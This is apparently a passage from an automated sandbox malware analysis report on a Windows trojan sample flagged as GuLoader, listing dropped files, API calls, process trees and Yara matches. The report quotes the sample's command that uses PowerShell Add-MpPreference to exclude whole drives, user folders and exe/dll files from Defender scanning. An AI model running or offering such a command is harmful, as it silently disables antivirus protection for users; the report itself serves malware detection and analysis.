                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0044EA406_2_0044EA40
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00496E186_2_00496E18
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0046B1E46_2_0046B1E4
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0045FCC86_2_0045FCC8
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00453DA46_2_00453DA4
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_00406D5F7_2_00406D5F
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_687E1BFF7_2_687E1BFF
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_004601F09_2_004601F0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0046C7CC9_2_0046C7CC
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0048C7F49_2_0048C7F4
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0044EA409_2_0044EA40
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00496E189_2_00496E18
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0046B1E49_2_0046B1E4
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0045FCC89_2_0045FCC8
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00453DA49_2_00453DA4
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_004601F012_2_004601F0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0046C7CC12_2_0046C7CC
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0048C7F412_2_0048C7F4
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0044EA4012_2_0044EA40
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00496E1812_2_00496E18
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0046B1E412_2_0046B1E4
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0045FCC812_2_0045FCC8
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00453DA412_2_00453DA4
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeProcess Stats: CPU usage > 98%
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: uniformerede.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                                Source: ._cache_uniformerede.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: Synaptics.exe.6.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                                Source: RCXCD96.tmp.6.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                                Source: YC9w8Aif.exe.9.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                                Source: RCXDA77.tmp.9.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                                Source: RCXF979.tmp.9.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                                Source: ~$cache1.9.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeSection loaded: starttiledata.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeSection loaded: starttiledata.dllJump to behavior
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,7_2_00403640
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 00406CDC appears 32 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 004049E4 appears 40 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 0049058C appears 112 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 00404A58 appears 34 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 004109E8 appears 68 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 004049C0 appears 117 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 004865B4 appears 38 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 00486788 appears 32 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 004070F0 appears 168 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 00404CCC appears 108 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 004967D4 appears 36 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 00403F78 appears 32 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 0040F7A4 appears 42 times
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: String function: 0049058C appears 56 times
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: String function: 004109E8 appears 34 times
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: String function: 004049C0 appears 73 times
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: String function: 004070F0 appears 81 times
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: String function: 00404CCC appears 54 times
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0043F118 NtdllDefWindowProc_A,GetCapture,6_2_0043F118
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004598AC NtdllDefWindowProc_A,6_2_004598AC
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,6_2_0045A054
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,6_2_0045A104
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A,6_2_0045E9EC
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,73C9B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,6_2_0044EA40
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0042F60C NtdllDefWindowProc_A,6_2_0042F60C
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0043F118 NtdllDefWindowProc_A,GetCapture,9_2_0043F118
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_004598AC NtdllDefWindowProc_A,9_2_004598AC
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,9_2_0045A054
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,9_2_0045A104
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A,9_2_0045E9EC
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,73C9B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,9_2_0044EA40
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0042F60C NtdllDefWindowProc_A,9_2_0042F60C
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0043F118 NtdllDefWindowProc_A,GetCapture,12_2_0043F118
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_004598AC NtdllDefWindowProc_A,12_2_004598AC
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,12_2_0045A054
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,12_2_0045A104
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A,12_2_0045E9EC
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,12_2_0044EA40
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0042F60C NtdllDefWindowProc_A,12_2_0042F60C
                                Source: uniformerede.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Source: uniformerede.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Source: uniformerede.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: Synaptics.exe.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Source: Synaptics.exe.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Source: Synaptics.exe.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: RCXCD96.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: YC9w8Aif.exe.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: RCXDA77.tmp.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Source: RCXDA77.tmp.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: RCXF979.tmp.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Source: RCXF979.tmp.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: ~$cache1.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.drBinary or memory string: OriginalFileName vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.drBinary or memory string: OriginalFilenameb! vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220527Jump to behavior
                                Source: classification engineClassification label: mal100.troj.evad.winEXE@21/60@6/2
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00425FB8 GetLastError,FormatMessageA,6_2_00425FB8
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004747D8 FindResourceA,6_2_004747D8
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeVirustotal: Detection: 62%
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeReversingLabs: Detection: 58%
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe"
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c start "" "C:\Users\user\AppData\Local\Temp\uniformerede.exe"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\uniformerede.exe "C:\Users\user\AppData\Local\Temp\uniformerede.exe"
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeProcess created: C:\Users\user\Desktop\._cache_uniformerede.exe "C:\Users\user\Desktop\._cache_uniformerede.exe"
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2904
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 4052
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exitJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c start "" "C:\Users\user\AppData\Local\Temp\uniformerede.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\uniformerede.exe "C:\Users\user\AppData\Local\Temp\uniformerede.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeProcess created: C:\Users\user\Desktop\._cache_uniformerede.exe "C:\Users\user\Desktop\._cache_uniformerede.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError,6_2_00475958
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,7_2_00403640
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError,9_2_00475958
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError,12_2_00475958
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeFile created: C:\Users\user\AppData\Local\Temp\uniformerede.exeJump to behavior
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_004021AA CoCreateInstance,7_2_004021AA
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00409ED2 GetDiskFreeSpaceA,6_2_00409ED2
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_01
                                Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_01
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6620
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeFile written: C:\Users\user\AppData\Local\Temp\udfrielser.iniJump to behavior
                                Source: Yara matchFile source: 12.0.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.Synaptics.exe.400000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.Synaptics.exe.400000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.Synaptics.exe.400000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.uniformerede.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.0.uniformerede.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000000.357173364.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000000.348826366.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000000.285408477.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000000.361096693.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000000.310907115.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXCD96.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\uniformerede.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RCXF979.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp, type: DROPPED
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeRegistry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\URBANITETENSJump to behavior
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeStatic file information: File size 1490944 > 1048576
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x136600

                                Data Obfuscation

                                barindex
                                Yara detected GuLoader
                                Source: Yara matchFile source: 00000007.00000002.532970198.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00446564 push 004465F1h; ret 6_2_004465E9
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00406B3C push 00406B8Dh; ret 6_2_00406B85
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00478CB0 push 00478D2Dh; ret 6_2_00478D25
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00422044 push ecx; mov dword ptr [esp], edx6_2_00422049
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0042E010 push 0042E03Ch; ret 6_2_0042E034
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0046C0B0 push ecx; mov dword ptr [esp], eax6_2_0046C0B2
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004761F8 push 0047623Bh; ret 6_2_00476233
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0049419C push 004941CFh; ret 6_2_004941C7
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0042E1BC push 0042E1E8h; ret 6_2_0042E1E0
